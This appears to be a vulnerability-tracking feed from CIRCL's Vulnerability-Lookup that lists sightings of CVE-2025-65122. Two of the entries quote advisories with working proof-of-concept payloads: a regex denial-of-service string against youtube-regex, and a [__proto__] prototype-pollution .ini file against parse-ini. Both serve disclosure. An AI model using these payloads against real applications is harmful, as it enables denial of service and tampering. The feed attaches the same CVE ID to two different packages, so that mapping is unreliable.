https://vulnerability.circl.lu/sightings/feed 2026-05-10T09:45:29.506535+00:00 Vulnerability-Lookup info@circl.lu python-feedgen Contains only the most 10 recent sightings. https://vulnerability.circl.lu/sighting/f51c6e0c-c3cf-422a-9b0b-127a547f185a/export 2026-05-10T09:45:30.007919+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "f51c6e0c-c3cf-422a-9b0b-127a547f185a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/66ef99397068c0a5e0d963bc47d7172c", "content": "Product: https://github.com/regexhq/youtube-regex\nVersion: v1.0.5\nVulnerability type: Regex Denial of Service\nCVE ID: CVE-2025-65122\n\nDescription: \nThe regex on line 11. in index.js contains a Regex denial\nof service when large input is provided. It takes longer\namount of time to process larger strings because regex will\ntry to backtrack each time it encounters watch?-.\n\nPayload used:\n\nvar youtubeRegex = require('youtube-regex');\nconst startTime = performance.now() let payload = 'youtube.com/' + 'watch?m'.repeat(30000) + '\\t' // contains youtube url address \n//youtubeRegex().test('unicorn youtube.com/watch?v=0EWbonj7f18');\nyoutubeRegex().test(payload);\nconst endTime = performance.now() console.log(`Time spent: ${endTime - startTime} milliseconds`)", "creation_timestamp": "2026-05-06T19:39:33.000000Z"} 2026-05-06T19:39:33+00:00 https://vulnerability.circl.lu/sighting/8cff9b3e-fff3-4268-afc3-b66f3715107c/export 2026-05-10T09:45:30.007726+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "8cff9b3e-fff3-4268-afc3-b66f3715107c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://gist.github.com/6en6ar/bdc8e0d472406ab98431f10273cbdbf3", "content": "Product: https://www.npmjs.com/package/parse-ini\nVersion: v1.0.6\nVulnerability type: Prototype Pollution inside parse-ini npm package through version 1.0.6\nCVE ID: CVE-2025-65122\n\nDescription: \nThere exists a prototype pollution vulnerability in parse-ini npm package, more specifically on lines 101. and 104 inside index.js() \nwhere the code does not check for presence of attacker controlled prototypes that can be supplied inside .ini files.\nPrototype pollution enables attacker to add arbitrary properties to global object prototypes, which may then be inherited by user-defined objects,\nthat can lead to code execution or denial of service in certain scenarios.\n\nPayload used:\n\nvar parser = require('parse-ini');\nvar iniObj = parser.parse('file.ini');\nconsole.log(iniObj.__proto__); //polluted\nconsole.log({}.polluted)//polluted\nconsole.log(iniObj.MySectionName.lastUsed);\n>\nPayload used(file.ini):\n\n; file.ini\nvariable1 = value1\n{MySectionName]\nlastUsed=3\n[__proto__]\npolluted = \"polluted\"", "creation_timestamp": "2026-05-06T19:46:52.000000Z"} 2026-05-06T19:46:52+00:00 https://vulnerability.circl.lu/sighting/2049ee5c-6aef-4b67-9903-6b6431e37df2/export 2026-05-10T09:45:30.002477+00:00 Automation user http://vulnerability.circl.lu/user/automation {"uuid": "2049ee5c-6aef-4b67-9903-6b6431e37df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2025-65122", "type": "seen", "source": "https://bsky.app/profile/thehackerwire.bsky.social/post/3mlbpa66hni2z", "content": "\ud83d\udfe0 CVE-2025-65122 - High (7.5)\n\nRegex Denial of Service in youtube-regex npm package through version 1.0.5.\n\nhttps://www.thehackerwire.com/vulnerability/CVE-2025-65122/\n\n#infosec #cybersecurity #CVE #vulnerability #security #patchstack", "creation_timestamp": "2026-05-07T17:06:16.113213Z"} 2026-05-07T17:06:16.113213+00:00